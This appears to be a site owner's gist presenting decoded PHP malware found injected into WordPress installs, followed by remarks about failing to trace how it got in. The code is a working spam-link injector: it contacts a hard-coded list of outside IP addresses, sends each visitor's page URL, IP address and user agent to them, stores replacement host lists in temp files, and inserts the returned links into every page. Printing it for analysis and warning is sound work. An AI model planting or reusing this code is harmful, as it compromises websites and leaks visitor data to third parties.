Decoding PHP injection on WordPress files. **!! Do NOT run this code on your machine !!**

gistfile1.php

<?php

/**
 * There are layers of protection to check a few things
 * - Only run this code once
 * - Only run when accessed by Google, MSN, or Yahoo!
 *
 * I removed those checks to make this more readable
 */

/**
 * Find path to system's temporary directory
 * 
 * @return string Full path to system temp
 */
function t_dir() {

	if ( function_exists( "sys_get_temp_dir" ) ) {

		if ( @is_writeable( sys_get_temp_dir() ) ) {
			return realpath(sys_get_temp_dir());
		}

	}


	if ( !empty( $_ENV["TMP"] ) && @is_writeable( realpath( $_ENV["TMP"] ) ) ) {
		return realpath( $_ENV["TMP"] );
	}
	if ( !empty( $_ENV["TMPDIR"] ) && @is_writeable( realpath( $_ENV["TMPDIR"] ) ) ) {
		return realpath( $_ENV["TMPDIR"] );
	}
	if ( !empty( $_ENV["TEMP"]) && @is_writeable( realpath( $_ENV["TEMP"] ) ) ) {
		return realpath( $_ENV["TEMP"] );
	}

	/**
	 * tempnam — Create file with unique file name
	 * 
	 * `tempnam ( string $dir , string $prefix )`
	 * 
	 * @var string
	 */
	$tempfile = @tempnam(__FILE__, "");

	if ( @file_exists($tempfile) ) {
		@unlink( $tempfile );
		if ( @is_writeable( realpath( dirname( $tempfile ) ) ) ) {
			return realpath( dirname( $tempfile ) );
		}

	}
	if ( @is_writeable( realpath( @ini_get( "upload_tmp_dir" ) ) ) ) {
		return realpath( @ini_get( "upload_tmp_dir" ) );
	}
	if ( @is_writeable( realpath( session_save_path() ) ) ) {
		return realpath( session_save_path() );
	}
	if ( @is_writeable( realpath( dirname( __FILE__ ) ) ) ) {
		return realpath( dirname( __FILE__ ) );
	}

	return null;
}

function get_t_dir_mass() {

	if (function_exists("sys_get_temp_dir")) {
		if (@is_writeable(sys_get_temp_dir())) {
			$res[] = realpath(sys_get_temp_dir());
		}
	}
	if (!empty($_ENV["TMP"]) && @is_writeable(realpath($_ENV["TMP"]))) {
		$res[] = realpath($_ENV["TMP"]);
	}
	if (!empty($_ENV["TMPDIR"]) && @is_writeable(realpath($_ENV["TMPDIR"]))) {
		$res[] = realpath($_ENV["TMPDIR"]);
	}
	if (!empty($_ENV["TEMP"]) && @is_writeable(realpath($_ENV["TEMP"]))) {
		$res[] = realpath($_ENV["TEMP"]);
	}
	$tempfile = @tempnam(__FILE__, "");
	if (@file_exists($tempfile)) {
		@unlink($tempfile);
		if (@is_writeable(realpath(dirname($tempfile)))) {
			$res[] = realpath(dirname($tempfile));
		}

	}
	if (@is_writeable(realpath(@ini_get("upload_tmp_dir")))) {
		$res[] = realpath(@ini_get("upload_tmp_dir"));
	}
	if (@is_writeable(realpath(session_save_path()))) {
		$res[] = realpath(session_save_path());
	}
	if (@is_writeable(realpath(dirname(__FILE__)))) {
		$res[] = realpath(dirname(__FILE__));
	}

	return array_unique($res);
}

function get_know_ip()
{
	$know[] = "130.0.233.18";
	$know[] = "130.0.237.24";
	$know[] = "149.154.154.191";
	$know[] = "151.236.17.13";
	$know[] = "151.236.18.8";
	$know[] = "178.209.52.218";
	$know[] = "178.73.210.163";
	$know[] = "37.235.53.202";
	$know[] = "46.17.57.141";
	$know[] = "46.246.93.130";
	$know[] = "5.61.45.110";
	$know[] = "176.99.6.245";
	$know[] = "151.236.25.47";
	$know[] = "151.236.28.97";
	$know[] = "151.236.26.86";
	$know[] = "151.236.20.19";
	$know[] = "144.76.178.235";
	$know[] = "188.116.23.77";
	$know[] = "80.67.12.206";
	$know[] = "5.61.38.129";
	$know[] = "37.230.118.51";
	$know[] = "5.187.5.185";
	$know[] = "5.187.1.129";
	$know[] = "5.187.4.155";
	$know[] = "209.159.153.165";
	$know[] = "144.76.178.236";
	$know[] = "176.9.193.201";

	foreach (get_t_dir_mass() as $t) {
		if (file_exists($t . DIRECTORY_SEPARATOR . "N2W3Y0qaFA")) {
			foreach (file($t . DIRECTORY_SEPARATOR . "N2W3Y0qaFA") as $tt) {
				$know[] = trim($tt);
			}
		}
	}
	return array_unique($know);
}

function save_know_ip($ip)
{
	$content = implode(PHP_EOL, $ip);
	foreach (get_t_dir_mass() as $t) {
		$f = fopen($t . DIRECTORY_SEPARATOR . "N2W3Y0qaFA", "w");
		fputs($f, $content);
		fclose($f);
	}
}

function my_get_real_ip()
{
	$proxy_headers = array(
		"CLIENT_IP",
		"FORWARDED",
		"FORWARDED_FOR",
		"FORWARDED_FOR_IP",
		"HTTP_CLIENT_IP",
		"HTTP_FORWARDED",
		"HTTP_FORWARDED_FOR",
		"HTTP_FORWARDED_FOR_IP",
		"HTTP_PC_REMOTE_ADDR",
		"HTTP_PROXY_CONNECTION",
		"HTTP_VIA",
		"HTTP_X_FORWARDED",
		"HTTP_X_FORWARDED_FOR",
		"HTTP_X_FORWARDED_FOR_IP",
		"HTTP_X_IMFORWARDS",
		"HTTP_XROXY_CONNECTION",
		"VIA",
		"X_FORWARDED",
		"X_FORWARDED_FOR"
		);
	foreach ($proxy_headers as $proxy_header) {
		if (isset($_SERVER[$proxy_header]) && preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $_SERVER[$proxy_header])) {
			return $_SERVER[$proxy_header];
		} else if (stristr(",", $_SERVER[$proxy_header]) !== FALSE) {
			$proxy_header_temp = trim(array_shift(explode(",", $_SERVER[$proxy_header])));
			if (($pos_temp = stripos($proxy_header_temp, ":")) !== FALSE)
				$proxy_header_temp = substr($proxy_header_temp, 0, $pos_temp);
			if (preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $proxy_header_temp))
				return $proxy_header_temp;
		}
	}
	return $_SERVER["REMOTE_ADDR"];
}
function my_get_url()
{
	$url = "http://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
	if (strpos($url, "?") !== false) {
		$url = substr($url, 0, strpos($url, "?"));
	}
	return $url;
}
function my_get_contents($ip, $page)
{
	if (function_exists("curl_init")) {
		$ch = curl_init("http://" . $ip . "/" . $page);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
		curl_setopt($ch, CURLOPT_TIMEOUT, 3);
		$ult = trim(curl_exec($ch));
		return $ult;
	}

	if (ini_get("allow_url_fopen")) {
		$ult = trim(@file_get_contents("http://" . $ip . "/" . $page));
		return $ult;
	}
	$fp = fsockopen($ip, 80, $errno, $errstr, 30);
	if ($fp) {
		$out = "GET $page HTTP/1.0\r\n";
		$out .= "Host: $ip\r\n";
		$out .= "Connection: Close\r\n\r\n";
		fwrite($fp, $out);
		$ret = "";
		while (!feof($fp)) {
			$ret .= fgets($fp, 128);
		}
		fclose($fp);
		$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
	}
	return $ult;
}
function my_samui_get_links()
{

	$all = get_know_ip();
	shuffle($all);
	$url     = my_get_url();
	$real_ip = my_get_real_ip();
	$ua      = strtolower($_SERVER["HTTP_USER_AGENT"]);
	$aid     = "1001";
	$cod     = md5($url . time());
	$check   = md5($cod);
	$ua      = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));
	$page    = "/slk.php?aid=" . $aid . "&url=" . $url . "&ip=" . $real_ip . "&ua=" . $ua . "&cod=" . $cod;

	foreach ($all as $ip) {
		$tc  = my_get_contents(trim($ip), $page);
		$pos = strpos($tc, $check);
		if ($pos !== false) {
			$proxy_list = substr($tc, 0, $pos);

			save_know_ip(explode("\n", $proxy_list));


			$links = substr($tc, $pos + 32);
			return $links;
		}
	}
}

/**
 * Modify page contents
 *
 * if the page is HTML, with a `<body>` tag, replace the contents
 */
function my_mod_con($con) {
	if ( strpos($con, "<body") !== false ) {
		$text = preg_replace("/<body(\s[^>]*)?>/i", "<body\1>" . my_samui_get_links(), $con, 1);
		return $text;
	} else {
		return $con;
	}
}

/**
 * OB Callback
 * 
 * @param  string $buf Contents of Output Buffer
 * @return Modified page contents, possibly Gzipped
 */
function my_callback( $buf ) {
	if ( headers_sent() ) {
		if ( in_array( "Content-Encoding: gzip", headers_list() ) ) {
			$tmpfname = tempnam( t_dir(), "FOO" );
			$zf       = fopen( $tmpfname, "w" );
			fputs( $zf, $buf );
			fclose( $zf );
			$zd       = gzopen( $tmpfname, "r" );
			$contents = gzread( $zd, 10000000 );
			$contents = my_mod_con( $contents );
			gzclose( $zd );
			unlink( $tmpfname );
			$contents = gzencode( $contents );
		} else {
			$contents = my_mod_con( $buf );
		}
	} else {
		$contents = my_mod_con( $buf );
	}
	return ( $contents );
}

/**
 * Start an output buffer, call `my_callback()` on end
 */
ob_start("my_callback");

I'll stop there. I tried to make a commit per level of eval( base64_decode( $crazyness ) ); but I'm pretty sure I missed a few.

What kills me is I checked through every file & the server logs to see if I could find how it got in. But I very well could have missed a security hole. I filtered through 28 WordPress installed on a single shared hosting account.

Bah!